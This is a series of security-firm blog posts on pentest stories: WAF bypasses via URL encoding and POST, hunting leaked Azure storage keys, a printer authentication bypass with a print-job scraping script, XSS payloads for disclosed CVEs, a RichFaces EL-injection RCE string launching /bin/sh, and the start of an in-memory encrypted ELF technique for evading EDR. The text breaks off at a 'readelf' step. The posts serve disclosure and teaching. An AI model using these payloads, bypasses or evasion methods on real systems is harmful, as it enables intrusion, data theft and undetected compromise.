Practical Web Application Hacking Advanced 1-2 August and 3-4 August 2020.

How to hack a company by circumventing its WAF for fun and profit – part 2

So far, one of the most successful and most visited posts on our blog has been this one. Following the readers’ interest in the topic, we have decided to publish more content like it. What we will do periodically in this space is recount a few stories drawn from circumstances that really happened. We had a lot of fun living them first-hand during penetration testing sessions, red team operations and well-deserved bug bounties. We hope you will too.

The “single-encoded-byte” bypass

Some time ago, we were contacted to perform the revalidation of an RCE web vulnerability that could be triggered by visiting a URL similar to this:

https://victim.com/appname/MalPath/something?badparam=%rce_payload%

The application was hosted behind a BIG-IP device with the ASM (Application Security Manager) module enabled, a layer 7 web application firewall (WAF) available on F5’s BIG-IP platforms. To react immediately and not leave the solution exposed to the internet, the network engineers thought it wise to deploy a custom WAF rule to protect the endpoint before a formal fix was introduced in the application’s code. Our role consisted of investigating the effectiveness and robustness of this rule, which looked something like this:

Its meaning was that if an HTTP GET request was intercepted (line 2) and the lowercase-converted URI contained both the strings “/malpath/” and “badparam=” (lines 3 and 4), the request would first be logged (line 7) and then blocked by returning HTTP error 404 to the client (line 8).

Actually, after deploying the custom WAF rule, by visiting the URL:

https://victim.com/appname/MalPath/something?badparam=%rce_payload%

…we receive the 404 HTTP error, meaning that the rule is working and the WAF is properly doing its job.

However, by reading the F5 documentation we discovered that the directive “HTTP::uri” (lines 3 and 4) returns the URI of the request without first fully decoding it! So if we visit the URL:

https://victim.com/appname/%4dalPath/something?badparam=%rce_payload%

…with “%4d” being the URL-encoded form of the character ‘M’, this is what happens:

  • The WAF intercepts the GET request. The URI “/appname/%4dalPath/something?badparam=%rce_payload%” is first entirely converted to lowercase by the “tolower” function in the WAF rule and becomes “/appname/%4dalpath/something?badparam=%rce_payload%”.
  • The URI is then searched for the strings “/malpath/” and “badparam=”. However, the string “/%4dalpath/” we sent does not match the string “/malpath/” in the WAF rule (line 3), which is therefore not hit.
  • Once the WAF control is bypassed, the HTTP request reaches the backend server, where the URI canonicalization and decoding processes take place. The request, with the URI converted from “/appname/%4dalPath/something?badparam=%rce_payload%” to “/appname/MalPath/something?badparam=%rce_payload%”, is passed to the target web application, which in turn serves it.
  • The “%rce_payload%” is now executed and produces its effects (opening a reverse shell, invoking an operating system command, etc.).

The lesson learned here is: always ensure the URI is decoded before comparing and checking it. A complete lack of URI decoding is very bad. The usage of the “contains” keyword in a WAF rule is even worse.
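A quick way to see the mismatch, reproduced here in Python rather than in iRule syntax:

# The raw URI check sees "%4dalpath", while the backend decodes it to "malpath".
from urllib.parse import unquote

raw_uri = "/appname/%4dalPath/something?badparam=%rce_payload%"

print("/malpath/" in raw_uri.lower())            # False -> WAF rule not hit
print("/malpath/" in unquote(raw_uri).lower())   # True  -> what the backend actually sees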

Partial URL decoding = full bypass

A couple of days later we were called back again to carry out the revalidation of the revalidation (lol) as the fix in the application code was taking more time than expected.

This time visiting both the URLs:

https://victim.com/appname/MalPath/something?badparam=%rce_payload%

and

https://victim.com/appname/%4dalPath/something?badparam=%rce_payload%

returned the 404 error page. In simple words, the WAF blocked us.

Then we attempted to double encode the letter “M” of “/Malpath/” with the sequence “%254d”. The final URL to visit was:

https://victim.com/appname/%254dalPath/something?badparam=%rce_payload%

Nothing. The web application firewall was blocking this request too. The reimplementation of the WAF rule now looks something like this:

Here lines 15 to 24 are equivalent to lines 1-10 of the previous version of the rule. This time, however, the strings “/malpath/” and “badparam=” are checked against a variable called “$decodeUri” (lines 17 and 18) rather than against “HTTP::uri” as before. What is this variable and where does it come from? Lines 1 to 14 define its content. In simple terms, “$decodeUri” is just the URI of the request (“[HTTP::uri]” at line 2), URL-decoded at most “max” times (with “max” defined at line 4) through a “while” loop (lines 9-13) using a counter variable (“cnt”, declared at line 5). The loop is interrupted when there are no more encoded characters left or when it has run “max” times (with “cnt” increased at each iteration).

To better understand what is going on here, it may help to browse this page and percent-encode the letter “M” multiple times by writing the sequence “%252525254d” into the text box. Now press the “Decode” button (see picture below) four times, pausing each time to see what happens. Have you seen it? This is exactly what the WAF rule above is doing with our URI.

So to bypass it, we have simply visited the following URL:

https://victim.com/appname/%252525254dalPath/something?badparam=%rce_payload%

On reception the WAF decodes the URI as follows:

  • (1st iteration of the loop):
    /appname/%2525254dalPath/something?badparam=%rce_payload%
  • (2nd iteration of the loop):
    /appname/%25254dalPath/something?badparam=%rce_payload%
  • (3rd iteration of the loop):
    /appname/%254dalPath/something?badparam=%rce_payload%
  • (4th iteration of the loop):
    /appname/%4dalPath/something?badparam=%rce_payload%

When the WAF rule quits the loop, the request’s URI is set to “/appname/%4dalPath/something?badparam=%rce_payload%“. Again, as in the previous case, the string “/malpath/” (line 17 of the WAF rule) does not match the “/%4dalpath/” in the URI, so the WAF lets the request pass through. The control is bypassed once more and the effect is again the execution of “%rce_payload%”. GAME OVER for the second consecutive time.
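A toy reimplementation of the bounded-decode logic (in Python, assuming “max” is 4, as suggested by the four iterations above) shows why one extra layer of encoding survives the loop:

# Roughly the same exit conditions as the iRule: stop when nothing looks encoded
# or after max_rounds passes.
from urllib.parse import unquote

def waf_decode(uri: str, max_rounds: int = 4) -> str:
    cnt = 0
    while "%" in uri and cnt < max_rounds:
        uri = unquote(uri)
        cnt += 1
    return uri

uri = "/appname/%252525254dalPath/something?badparam=%rce_payload%"
decoded = waf_decode(uri)
print(decoded)                              # .../%4dalPath/... -> one layer left
print("/malpath/" in decoded.lower())       # False -> request passes the WAF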

One could think: “Ok, but this is a stupid mistake! Just fire these monkeys pretending to be security guys!”. That is not entirely fair, as the “-normalized” option, which undoubtedly simplifies the life of network engineers, can be adopted only with the most recent versions of iRules, leaving the creation and deployment of a custom rule as the only option, which is a notoriously error-prone process. However, it is still surprising how many sources out there publicly advertise these flawed examples, even in the official F5 documentation (see the screenshot below).

For copy & paste supporters this kind of “code snippet” is like honey. Don’t get us wrong: we have nothing against copy & paste, except when it is practiced in cybersecurity without understanding what is being done. In such circumstances copy & paste has countless times been the root cause of serious security vulnerabilities.

But let’s switch back to our main story! After the identification of the new issue the fix was quick (see the added part below).

Basically, following the “while” loop (lines 9-13 in the picture at the beginning of this paragraph), the WAF rule was updated with an “if” branch. At the end of the loop it checks whether the value of the counter variable “cnt” is equal to the value of the “max” variable. If it is, this means the “while” loop was interrupted while there were still characters left to decode in the URI. As we do not want to process a request still containing encoded characters, the WAF rule responds with a 404 error, preventing the activation of the malicious payload.

Wrong assumptions … any gumption?

Most misconfigurations and bypass techniques at the WAF level are not linked to technical problems or bugs afflicting the device itself, but to wrong assumptions in the logic of its rules.

Our story could have had a happy ending at this point. Two revalidations had already revealed some flaws in the web application firewall’s configuration, and finally a pretty tough WAF rule had been implemented, decently decoding the URI. To make it short, at a certain moment somebody realized that the same vulnerability could also be exploited with an HTTP POST request. The WAF rule provided protection only against GET requests, and a new modification was needed. So, after the umpteenth change, we were called back again to verify that this time everything was working as expected.

To cover both exploitation cases (GET and POST), the network engineers thought to apply a fix by deleting line 16 of the WAF rule:

if ([HTTP::method] equals "GET") [...]

Without that line the check on the URI would be performed on any HTTP request, regardless of the method specified. It could have been an elegant solution if it had worked… but can you spot the problem here? Take a few seconds before answering. Well, when the URL below is browsed:

https://victim.com/appname/MalPath/something?badparam=%rce_payload%

the following HTTP request is issued:

GET /appname/MalPath/something?badparam=%rce_payload% HTTP/1.1
[...]

If, after discovering that the GET method is blocked at the WAF level, an attacker attempted to circumvent it via POST, the following request would be issued instead:

POST /appname/MalPath/something HTTP/1.1
[other HTTP headers]

badparam=%rce_payload%

Would the “%rce_payload%” be triggered this time, given all the premises above? Yes, it would. Why? The answer is in the lines 17 and 18 of the WAF rule, shown below once more.

Let’s compare the content of the attacker’s POST request with the logic of the custom rule. In this case, at line 17 the fully decoded and lowercase-converted URI contains the string “/malpath/”. True. However, line 18 stems from an incorrect assumption. The parameters of a POST request reside in the HTTP body and not in the query string! Line 18 of the WAF rule is instead checking for the presence of the string “badparam=” in the “$decodedUri” variable, which in the case of the attacker’s POST request contains only the string “/appname/MalPath/something”. For the sake of clarity: the WAF rule is not checking for the string “badparam=” where it should, so the rule is bypassed.

Officially, the revalidation of the revalidation of the revalidation was the last round of checks needed to be confident that the implemented WAF rule was providing the desired level of security against this web vulnerability. It took one week to tune the custom WAF rule and then, a few days later, it was suddenly removed because in the meantime the application code had been patched 😀

If it helps to repeat it once more: WAF virtual patching is fine if you need a bit of extra time before fixing a serious vulnerability, but it must not be abused. One week of exposure to RCE is a huge window for motivated attackers. The only way to sleep peacefully is to solve your problems at the code level and patch, patch, patch as soon as possible! It would probably have been worth dedicating all the resources to patching the application code from the beginning, rather than struggling to implement a working WAF rule by trial and error.

That’s all for today. Other stories like this will be published in future. So stay tuned and continue to follow us!

Hey! Red Timmy Security will be at Blackhat Las Vegas this year too! Check out our trainings!

Practical Web Application Hacking Advanced 1-2 August and 3-4 August 2020.

Cloud pentesting in Azure: one access key to rule them all

As cloud computing is on the rise, more of our penetration testing efforts will shift towards services hosted in the cloud. Testing a web app for vulnerabilities is no different whether it is hosted on-premises, in the cloud or in your basement. What does change is how the application interacts with other services. Take the database, for example: no longer located on your own SQL server but in the cloud as well. The solution used by Azure is called Azure Storage, and in this article we explore its weaknesses.

Azure Storage

The type of data that can be stored on an Azure Storage account is wide-ranging. You should think of it as the cloud-replacement for file servers. Some examples:

  • Logs
  • Virtual machine hard disk images
  • Backups
  • Documents and files

There are multiple ways in which a user or an application can access this data. One of them is by use of a key.

By default, every storage account has two keys that provide full access to its data. They are called the primary key and the secondary key, although both provide the same level of access. Multiple services using the storage account share these keys, so we are dealing with:

  • A full access key
  • Shared between services
  • Inconvenient to replace

It’s a scary thought. To view these keys, we have to browse the Azure Portal, as can be seen in the image below.

The access keys are accessible to the Azure administrator by browsing to the storage account settings.

Attacker value

It’s immediately clear that this is an attractive lure for an attacker: lots of data and shared keys that give full access.

So where do we find this key? The first place to look is in source code and configuration files. Developers need to write code to access the storage, and might place the key inside their code (instead of the much more secure option, the Azure Key Vault). Storage account keys are 64-byte values, encoded in Base64.

Because code bases can be large, you can start by searching for usage of these classes and libraries:

  • Microsoft.WindowsAzure.Storage.Auth (.NET)
  • com.microsoft.azure.storage.StorageCredentials (Java)
  • AzureStorage.createBlobService (JavaScript)

In config files, you can try to grep on:

  • StorageConnectionString
  • StorageServiceKeys
  • StorageAccountKey

For example, you can see from this GitHub screenshot that many repositories expose such keys within code. It’s not unthinkable that the same is possible for the assignment you are working on.

Azure storage keys can be found on github
Searching all repositories of GitHub for the string “StorageConnectionString” returns more than 35,000 results. Take for example this recently updated config file exposing the storage key.
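A small, rough scanner along these lines might grep a checked-out code base for the marker strings listed above and for 88-character Base64 values (which is what a 64-byte account key looks like once encoded); the paths and heuristics are of course just a starting point:

# Crude key hunter: flags lines containing the config markers above or values
# shaped like a Base64-encoded 64-byte key (86 chars + "==" padding).
import re
import sys
from pathlib import Path

MARKERS = ("StorageConnectionString", "StorageServiceKeys", "StorageAccountKey")
KEY_RE = re.compile(r"[A-Za-z0-9+/]{86}==")

def scan(root: str) -> None:
    for path in Path(root).rglob("*"):
        if not path.is_file():
            continue
        try:
            text = path.read_text(errors="ignore")
        except OSError:
            continue
        for lineno, line in enumerate(text.splitlines(), 1):
            if any(m in line for m in MARKERS) or KEY_RE.search(line):
                print(f"{path}:{lineno}: {line.strip()[:120]}")

if __name__ == "__main__":
    scan(sys.argv[1] if len(sys.argv) > 1 else ".")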

Developer tools

A second way of finding these keys is obtaining them from the tools that developers use to access Azure Storage. For this scenario, you will need a foothold on a developer’s machine. There are a number of tools frequently used for this purpose:

  • Azure Storage Explorer
  • CloudXplorer
  • TableXplorer
  • Redgate Azure Explorer

Having access to these tools, it is often straightforward to find the keys: they are usually set in the preferences or configuration section of the application.

Using the Azure Storage key

Once you have obtained the key, you should start identifying the type of storage accessible. Azure distinguishes between blob data, table data, queues and files. How to exactly determine this is out of scope for this article, but I want to share with you one quick and easy way of accessing files.

By default, Azure file shares are reachable via SMB 3.0, on port 445, with only one account, which has Full Control permissions. None of this is configurable. You can simply establish an SMB session using the key as the password:

net use * \\<storage_account_name>.file.core.windows.net\<share_name> /USER:AZURE\<storage_account_name> <primary_key>

Just by using the primary key we get full access to the files stored in Azure Storage.

SAS tokens

Next to keys there is another interesting method of access penetration testers should be aware of: SAS tokens. As can be seen in the image below, they can be created with more restrictions than the storage keys, which give full access. The Azure administrator can restrict the data type, set a time limit and even restrict the IP addresses from which the data may be accessed.

No file level restrictions can be made for SAS tokens created in the Azure Portal

This makes them far less powerful than storage keys; however, if you find them they may still be useful. One thing that cannot be restricted from the Azure Portal is exactly which objects can be accessed with the SAS token: it just provides access to all files (or all blobs, all queues, etc.).

It is possible to restrict access to only one file, for example, but for that the SAS token would have to be generated via PowerShell, which means more effort for the administrator and is therefore less likely to be the case.

Conclusion

Hunting for storage access keys and tokens should be a top priority for penetration testers and red teamers conducting exercises in Azure environments. Access to storage means access to files, logs and virtual machine hard drive images, and will in almost any case mean game over for the target.

Join us at Blackhat Las Vegas this year with our Practical Web Application Hacking Advanced Course on 1-2 August and 3-4 August! We look forward to seeing you there!

Meanwhile, follow us on twitter: https://twitter.com/redtimmysec

Hacking the Oce Colorwave printer: when a quick security assessment determines the success of a Red Team exercise.

Back in September 2019, we at Red Timmy Security were involved in a Red Team exercise. We had to simulate the scenario of a malicious insider plugging a Raspberry Pi device into the network to potentially use as a C&C, and to check how long the people monitoring the environment would take to detect it. Furthermore, the place where we hid our device had to be tricky enough to spot, with the aim of pouring a pinch of extra pepper on the challenge against the blue team.

Consequently, we did not simply want to drop the device at the first available location, raising the suspicions of other employees who were unaware of our real role and increasing the risk of being caught. Therefore, for the first couple of days of the engagement we behaved normally: we were assigned a company laptop and a badge and completed all the onboarding tasks typical of when somebody is hired for real. Oh well, almost. On the second day, after opening the browser on our shiny new company laptop, we mistakenly typed the number “1” in the URL bar and discovered that some IP addresses had already been visited in the browsing history.

We selected the first URL in the list (a local IP address) and visited it. It was the web interface of the Océ Colorwave 500 printer, a big boy weighing more than 250 kilograms (see picture below).

Why not give it a quick look? I guess you know how it went. We did a mini assessment of the printer that lasted a couple of hours. That was enough to discover five different flaws. However, for the purposes of this story, only one was relevant. We provide the details of the rest at the end of this post.

Basically we discovered that the Oce Colorwave 500 printer was vulnerable to an authentication bypass bug on the page “http://<printer-IP>/home.jsp”. When that page is browsed by an anonymous (unauthenticated) user who clicks the “View All” button with the intention of viewing the current job queue, the application returns a login panel asking for administrative credentials.

However, it was sufficient to append the parameter “openSI=[SI]” to the “home.jsp” page (with “[SI]” being the name of a network user) to view the printer inbox of that user and all the related print jobs, thus completely skipping the authentication process.

Conveniently, the name of the network user whose inbox we wanted to spy on was nothing more than their Windows Active Directory username. The convention used internally by the target company was easy enough to understand (a combination of the user’s first name and surname, and of course AD was “publicly queryable”), so it was really a joke to script an automated process collecting all the printed documents from the device’s queue for subsequent manual analysis.
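
To give an idea of what that automation looked like, here is a minimal C sketch with libcurl. It is purely illustrative: the usernames, the PRINTER-IP placeholder and the way responses are handled are assumptions, not the actual script we used during the engagement.

/* Illustrative only: iterate over AD usernames and fetch each user's printer
   inbox page via the openSI authentication bypass described above. */
#include <stdio.h>
#include <curl/curl.h>

int main(void)
{
    const char *users[] = { "jdoe", "asmith" };   /* hypothetical AD usernames */
    char url[256];

    curl_global_init(CURL_GLOBAL_DEFAULT);
    CURL *curl = curl_easy_init();
    if (curl == NULL)
        return 1;

    for (size_t i = 0; i < sizeof(users) / sizeof(users[0]); i++) {
        /* the bypass: openSI=<AD username> appended to home.jsp */
        snprintf(url, sizeof(url), "http://PRINTER-IP/home.jsp?openSI=%s", users[i]);
        curl_easy_setopt(curl, CURLOPT_URL, url);
        curl_easy_perform(curl);   /* by default the response body goes to stdout */
    }

    curl_easy_cleanup(curl);
    curl_global_cleanup();
    return 0;
}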

We did not need to poll the device frequently, just once per user, as the queue of printed jobs was configured (a default setting of the printer, we guess) to be shredded only every 2 weeks. This gave us enough time to download everything submitted to the printer by anyone in the company who had used it in the last 14 days. After finishing the task, we started to manually analyze all the documents collected. A tedious but rewarding task in the end!

We were indeed lucky enough to find the blueprints/security plans of the customer building, including the space hosting us. At the beginning everything was quite tough to read, as the blueprints were full of meaningless labels and symbols. But in the middle of the set of documents exfiltrated from the printer spool we also found a legend with the description of each symbol. Something similar to this:

After getting familiar with it, we knew the exact location of desks, security cameras, conference rooms, security equipment including card readers, local alarms / sounders, electromagnetic locks, intercoms, patch panels, network cables, etc. in the building!

It was the turning point of our exercise. The place we found for our Raspberry Pi device and what happened later is another story.

Most importantly, soon after the closure of the red team operation, the e-shredding functionality was activated and applied to all print jobs, and the device was immediately isolated from the network and put behind a firewall in a separate VLAN.

We contacted the vendor of course and communicated our findings. After a few days the vendor replied, informing us of the existence of a newer firmware version than the one running on the printer we tested (4.0.0.0). As no CVEs had been registered for these bugs in the past, we decided to do that ourselves.

In total we have registered five CVEs. All these bugs (two Reflected XSS, one Stored XSS and a systemic CSRF), including the authentication bypass already described (CVE-2020-10669), have been discovered by Giuseppe Calì with the contribution of Marco Ortisi. Below you can find the additional details for each of them.

CVE-2020-10667

The web application exposed by the Canon Oce Colorwave 500 printer (firmware version 4.0.0.0 and possibly below) is vulnerable to Stored XSS in “/TemplateManager/indexExternalLocation.jsp”. The vulnerable parameter is “map(template_name)”.

An external location is first created by browsing the URL “http://<printer-IP>/TemplateManager/editTemplate.jsp?type=ExternalLocation”. Here the “Name” parameter (actually the “map(template_name)” parameter in the POST request generated after clicking the “Ok” button) is injected with the following sample JavaScript payload:

"<script>alert(document.cookie);</script>

After creating the external location template, any attempts to edit it will trigger the sample payload.

CVE-2020-10668

The web application exposed by the Canon Oce Colorwave 500 printer (firmware version 4.0.0.0 and possibly below) is vulnerable to Reflected XSS in “/home.jsp”. The vulnerable parameter is “openSI”. Browsing the URL:

http://<printer-IP>/home.jsp?openSI=</script><script>alert(document.cookie);</script>

an alert box will pop up on the page, showing that the attacker’s payload has been executed in the context of the user’s browser session.

CVE-2020-10670

The web application exposed by the Oce Colorwave 500 printer (firmware version 4.0.0.0 and possibly below) is vulnerable to Reflected Cross-Site Scripting in “/SettingsEditor/settingDialogContent.jsp”. The vulnerable parameter is “settingId”. Browsing the URL:

http://<printer-IP>/SettingsEditor/settingDialogContent.jsp?settingId=<img src=x onerror=”alert(document.domain);”/>

an alert box will pop up on the page, showing that the attacker’s payload has been executed in the context of the user’s browser session.

CVE-2020-10671

The web application of the Canon Oce Colorwave 500 printer (firmware version 4.0.0.0 and possibly below) is missing any form of CSRF protection. This is a system-wide issue. An attacker could perform administrative actions by targeting a logged-in administrative user.

That’s all for today. As usual we remind you that we will be at Blackhat Las Vegas with our Practical Web Application Hacking Advanced Course on 1-2 August and 3-4 August 2020.

Richsploit: One tool to exploit all versions of RichFaces ever released

We are proud to release Richsploit, a tool we wrote to exploit multiple versions of RichFaces. This infamous Java library is included with many JSF web applications to provide advanced UI elements beyond the (very limited) set built into the framework. As a consequence, many websites using JSF are vulnerable to exploitation.

How to detect RichFaces

When a website is using RichFaces, it will load resources from specific URLs, which you can see when you monitor outgoing requests with tools like Burp or the browser’s developer tools.

  • Richfaces 3.x: http://example.com/app_name/a4j/g/..
  • Richfaces 4.x: http://example.com/app_name/rfRes/org.richfaces…

Tools like Wappalyzer can be used as well.

Vulnerable versions

All versions of RichFaces released since September 2007 (>= 3.1.0) are vulnerable to at least one exploit. See below an overview of which version is vulnerable to which exploit:

RichFaces 3
  • 3.1.0 to 3.3.3: CVE-2013-2165
  • 3.1.0 to 3.3.4: CVE-2018-12533
  • 3.1.0 to 3.3.4: CVE-2018-14667
RichFaces 4
  • 4.0.0 to 4.3.2: CVE-2013-2165
  • 4.0.0 to 4.5.4: CVE-2015-0279
  • 4.5.3 to 4.5.17: CVE-2018-12532

Exploits

What follows is a brief overview of how each vulnerability works and can be exploited. For more background information, I will refer to some external articles which describe the technicalities in more detail.

CVE-2013-2165

This vulnerability was the first one identified in RichFaces, and it affects both version 3.x and 4.x. It’s a classic deserialization vulnerability, which allows deserialization of arbitrary Java serialized object streams. To exploit it, the application has to have vulnerable libraries on the classpath from which a gadget chain can be built.

Because there is no look-ahead check implemented, every class on the classpath is a potential gadget candidate. One example would be Apache Commons Collections, which is often bundled with JSF applications.

You can prepare a payload with a tool like ysoserial, save it to a file, and feed it to Richsploit via the “-p” parameter.

More information: https://codewhitesec.blogspot.com/2018/05/poor-richfaces.html

CVE-2015-0279

This second vulnerability is harder to exploit, but potentially more rewarding. It’s an EL injection vulnerability that can lead to remote code execution. The idea is to send a properly serialized object this time, but inside the object we put malicious EL code.

EL stands for Expression Language, which is a limited form of Java, used to attach small pieces of logic to UI listeners (e.g. clicking a button would invoke a function call). Even though the capabilities are very limited, we can use a series of tricks to achieve remote code execution.

Richsploit will inject the following EL string when executed: #{"".getClass().forName("java.lang.ProcessBuilder").getConstructors()[1].newInstance(("/bin/sh~-c~"+COMMAND).split("~")).start()}

Let’s take a step-by-step look at how this works.

Expression Language restricts us to a one-liner, and we can only start from a variable that is in EL scope:

  • Lambda parameters
  • Literals
  • Managed beans
  • Implicit objects
  • Variables defined in the xhtml

In our example, we start with an empty string, which is a literal.

Now we need a way to get from the String class to the ProcessBuilder class. We do that by first transforming to the generic Class<> type. Class is an object in Java that represents a Java class. It has methods like getConstructor(), getMethod(), etc.

From there we transform our object into a ProcessBuilder type, using the forName() function of Class. We use ProcessBuilder instead of the more famous Runtime, because:

  • ProcessBuilder allows setting the command via the constructor
  • Runtime needs a call to Runtime.getRuntime(), but static calls are not allowed in EL (yet another restriction)

To use this class, we have to instantiate it. The getConstructors() function returns an array of all constructors of the class. Unfortunately, the order in which they appear in the array changes each time the application is launched. Therefore, this method may require some trial and error until the right constructor happens to be at index 1.

Luckily, ProcessBuilder only has two constructors, so we have a 50% chance of success.

EL doesn’t let us write an array literal, so we use the split() function to transform the String into a String[].

Finally, the start() call is required to make ProcessBuilder actually launch the process.

More information: https://issues.redhat.com/browse/RF-13977

CVE-2018-12532

This vulnerability is a bypass of the fix for the previous one (CVE-2015-0279). As the patch for CVE-2015-0279 (introduced in 4.5.4) disallowed the use of parentheses in the EL method expression of the contentProducer, it seemed like a dead end.

But if you are familiar with EL internals, you would know that EL expressions can have custom function mappers and variable mappers, which are used by the ELResolver to resolve functions (i.e., name in ${prefix:name()}) and variables (i.e., var in ${var.property}) to Method and ValueExpression instances respectively. Fortunately, various VariableMapper implementations were added to the whitelist (since version 4.5.3).

So to exploit this, all that is needed is to use a variable in the contentProducer method expression, like ${dummy.toString}, and add an appropriate VariableMapper to the method expression that maps dummy to a ValueExpression containing the EL we want to inject (same as with CVE-2015-0279).

CVE-2018-12533

This CVE is similar to CVE-2015-0279, but it uses a different class. Instead of org.resource.MediaResourceOutput, it uses org.richfaces.renderkit.html.Paint2DResource$ImageData.

The trick is that ImageData extends org.ajax4jsf.resource.SerializableResource, which is in the whitelist that was introduced in 3.3.4 to fix the Java deserialization vulnerability (CVE-2013-2165).

More information: https://codewhitesec.blogspot.com/2018/05/poor-richfaces.html

CVE-2018-14667

This final CVE is the most elaborate one and requires some extra detailed explanation, because there are no other write-ups available on the internet except this slideshare.

It’s again an EL injection, similar to CVE-2015-0279. The general idea is as follows:

  1. Visit a page that contains the <a4j:mediaOutput> tag. This will register UserResource for the session
  2. Prepare the serialized payload, containing the EL injection string
  3. Visit the UserResource URL and attach the encoded serialized payload object in the URL after /DATA/
  4. The UserResource class will be instantiated with data from the payload, leading to EL execution

To see this in more detail, this is the call chain from step 3:

/richfaces-demo-jsf2-3.3.3.Final-tomcat6/a4j/s/3_3_3.Finalorg.ajax4jsf.resource.UserResource/n/s/-1487394660/DATA/eAFtUD1LAzEYfi0WP6q[...]zrk29wt4uKHd.jsf

When this URL is provided, the filter defined in web.xml sends it to BaseFilter, which will send it to:

InternetResourceService.java:
The getResourceDataForKey() function reads the /DATA/ object and returns it as a Java Object.
Object resourceDataForKey = getResourceBuilder().getResourceDataForKey(resourceKey);

InternetResourceService.java:
It is then saved in resourceContext
resourceContext.setResourceData(resourceDataForKey);

InternetResourceService.java:
The ResourceLifeCycle.send() method is called, which will call sendResource()
getLifecycle().send(resourceContext, resource);

ResourceLifeCycle.java:
Here, the send() method is called DIRECTLY ON THE RESOURCE. So this roughly translates to UserResource.send(context_containing_el)
resource.send(resourceContext);

This is the send() function of the vulnerable class UserResource.java, whose code I provide here:

 public void send(ResourceContext context) throws IOException {
   // restoreData() deserializes the attacker-controlled object appended after /DATA/ in the URL
   UriData data = (UriData) restoreData(context);
   FacesContext facesContext = FacesContext.getCurrentInstance();
   if (null != data && null != facesContext) {
     // Send headers
     ELContext elContext = facesContext.getELContext();
     // Send content
     OutputStream out = context.getOutputStream();
     // data.createContent carries the attacker-supplied MethodExpression
     MethodExpression send = (MethodExpression)
         UIComponentBase.restoreAttachedState(facesContext, data.createContent);
     // invoking it evaluates the injected EL on the server
     send.invoke(elContext, new Object[]{out, data.value});
   }
 }

The send.invoke() will execute the EL coming from the context.
So the only way to reach this vulnerable method is by supplying UserResource as the resource in the URL, otherwise resource.send() will never lead to the send() method of UserResource.

Now for the payload, the object we supply is in the ‘context’ variable. It will need to survive:

  • restoreData(context)
  • A cast to UriData
  • A dereference to .createContent, which has to contain a MethodExpression

This means the gadget chain looks as follows:

org.ajax4jsf.resource.UserResource.UriData 
createContent:
javax.faces.component.StateHolderSaver
savedState:
org.jboss.el.MethodExpressionImpl
exp: "${Expression Language}"

See the source code of Richsploit for how this particular serialized object is created. Some tricks with reflection are required because UriData has private fields, and there would have been no way to set the value of createContent directly.

Download

Richsploit can be found on our GitHub page. And remember to join us at Blackhat Las Vegas this year with our Practical Web Application Hacking Advanced Course on 1-2 August and 3-4 August!

Blue Team vs Red Team: how to run your encrypted ELF binary in memory and go undetected

Imagine finding yourself in a “hostile” environment, one where you can’t run exploits, tools and applications without worrying about prying eyes spying on you, be they a legitimate system administrator, a colleague sharing access with you, or a software solution that scans the machine you are logged in to for malicious files. Your binary should live in encrypted form on the filesystem, so that no static analysis is possible even if it is identified and copied somewhere else. It should be decrypted on the fly in memory only when executed, preventing dynamic analysis too, unless the decryption key is known.

How to implement that?

On paper everything looks fine, but how do we implement this in practice? At Red Timmy Security we have created the “golden frieza” project, a collection of several techniques to support on-the-fly encryption/decryption of binaries. Even though we are not ready yet to release the full project, we are going to discuss in depth one of the methods it implements, accompanied by some supporting source code.

Why is this discussion relevant to security analysts working in SOC departments, Threat Intelligence and Red Teams alike? Think about a typical Red Team operation, in which tools that commonly trigger security alerts in the SOC, such as “procmon” or “mimikatz”, are uploaded to a compromised machine and then launched without the installed endpoint protection solutions or EDR agents complaining about it. Alternatively, think about a zero-day privilege escalation exploit that an attacker wants to run locally on a freshly hacked system, but does not want reverse engineered while stored on the filesystem and consequently divulged to the rest of the world.

This is exactly the kind of technique we are going to talk about.

A short premise before we get started: all the examples and code released (github link) work with ELF binaries. Conceptually there is nothing preventing you from implementing the same techniques with Windows PE binaries, of course with the appropriate adjustments.

What to encrypt?

An ELF binary file is composed of multiple sections. We are mostly interested in encrypting the “.text” section, which holds the instructions that the CPU executes once the interpreter maps the binary in memory and transfers execution control to it. To put it simply, the “.text” section contains the logic of our application that we do not want to be reverse engineered.

Which crypto algorithm to use?

To encrypt the “.text” section we will avoid block ciphers, which would force the binary instructions in that section to be aligned to the block size. A stream cipher fits perfectly in this case, because the length of the ciphertext produced in output is equal to that of the plaintext, hence there are no padding or alignment requirements to satisfy. We choose RC4 as the encryption algorithm. A discussion of its security is beyond the scope of this blog post; you can swap in whatever else you like.
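
For reference, RC4 is compact enough that a sketch of it fits in a few lines. The routine below works in place, so the same call both encrypts and decrypts; it is only an illustration of the stream cipher choice, not necessarily the exact code used by the project.

/* Minimal RC4 sketch (key scheduling + keystream generation), in place. */
#include <stdint.h>
#include <stddef.h>

void rc4(const uint8_t *key, size_t keylen, uint8_t *buf, size_t len)
{
    uint8_t S[256];
    size_t i, j = 0, k;

    for (i = 0; i < 256; i++)
        S[i] = (uint8_t)i;
    for (i = 0; i < 256; i++) {                  /* key-scheduling algorithm */
        j = (j + S[i] + key[i % keylen]) & 0xff;
        uint8_t tmp = S[i]; S[i] = S[j]; S[j] = tmp;
    }

    i = j = 0;
    for (k = 0; k < len; k++) {                  /* pseudo-random generation */
        i = (i + 1) & 0xff;
        j = (j + S[i]) & 0xff;
        uint8_t tmp = S[i]; S[i] = S[j]; S[j] = tmp;
        buf[k] ^= S[(S[i] + S[j]) & 0xff];       /* XOR: same operation encrypts and decrypts */
    }
}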

The implementation

The technique to be implemented must be as easy as possible. We want to avoid manual memory mappings and symbol relocations. For example, our solution could rely on two components:

  • An ELF file compiled as a dynamic library exporting one or more functions containing the encrypted instructions to be protected from prying eyes;
  • the launcher, a program that takes the ELF dynamic library as input, decrypts it in memory by means of a crypto key and then executes it.

What is not clear yet is what we should encrypt: the full “.text” section or just the malicious functions exported by the ELF module? Let’s put an experiment into practice. The following source code exports a function called “testalo()” that takes no parameters. After compilation, we want it to be decrypted only once it has been loaded in memory.
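
The original listing was included as an image. Based on the output shown later in this post and on the symbols it imports (“puts()” and “exit()”), it was something along these lines:

/* testalo_mod.c - reconstruction of the dummy module */
#include <stdio.h>
#include <stdlib.h>

void testalo(void)
{
    puts("Sucalo Sucalo oh oh!");
    puts("oh oh Sucalo Sucalo!!");
    exit(0);
}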

We compile the code as a dynamic library:

$ gcc testalo_mod.c -o testalo_mod.so -shared -fPIC

Now let’s have a look at its sections with “readelf”:

